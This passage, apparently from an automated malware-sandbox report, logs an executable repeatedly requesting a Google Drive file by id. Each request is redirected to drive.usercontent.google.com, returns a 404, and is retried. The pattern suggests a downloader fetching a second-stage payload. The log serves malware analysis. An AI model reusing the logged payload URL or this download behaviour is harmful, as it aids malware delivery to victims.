                                                    Content-Security-Policy: script-src 'nonce-9kCbDWdbZ-iRhnrYLz6QJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 59 45 6b 7a 6a 43 6b 59 30 58 4f 5a 66 54 64 51 72 36 7a 67 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NYEkzjCkY0XOZfTdQr6zgw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.752019172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:08 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:08 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:08 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: script-src 'nonce--mzrAqgxBIYFxqWDiHKavw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.752030142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:09 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:09 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgSqR202vsYFlGUT8F_e2rBkXD6pCvy7vEZ-FupVek8K6laBLp2o9oUT5YTNFdw5_dvZ
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:09 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-4gXEqPwkoSbsn-y4SjUKsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:09 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 4e 75 49 32 46 4d 35 6c 2d 67 61 39 4c 42 79 59 73 6f 36 64 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RNuI2FM5l-ga9LByYso6dg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.752036172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:10 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:10 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:10 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-BLr1gmWPJW8QMfQvs0NNNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.752047142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:11 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:12 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgSQlDxdwPPpnQe-m8d8HRWbvK1dV1T7h1JhMpVi234qKnTMI9rM9JLWlbh33qrady4TsoACAuU
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:11 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-SUloJBdq08Wmxnct-C8ckg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 50 78 30 34 62 38 53 75 75 33 73 57 4e 63 5f 4f 61 48 35 4d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CPx04b8Suu3sWNc_OaH5MA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.752053172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:12 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:13 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:12 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-4I6TFxJYhvhQjnKM_9MYLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.752062142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:13 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:14 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgRTwu84u5Ut8GDTXXUUBlel7w7BRgvm1PuGo450eWbm3bRrtTwyn_DAiC-ziLTv6sEC
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:14 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-kIfC2fgDuGA5Ah0OYsRs0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:14 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 75 61 77 30 7a 76 58 33 42 6a 6e 41 5a 75 61 63 64 52 58 33 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yuaw0zvX3BjnAZuacdRX3g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.752070172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:15 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:15 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:15 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-v4nx6z8otwgWM_8iltqh5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.752079142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
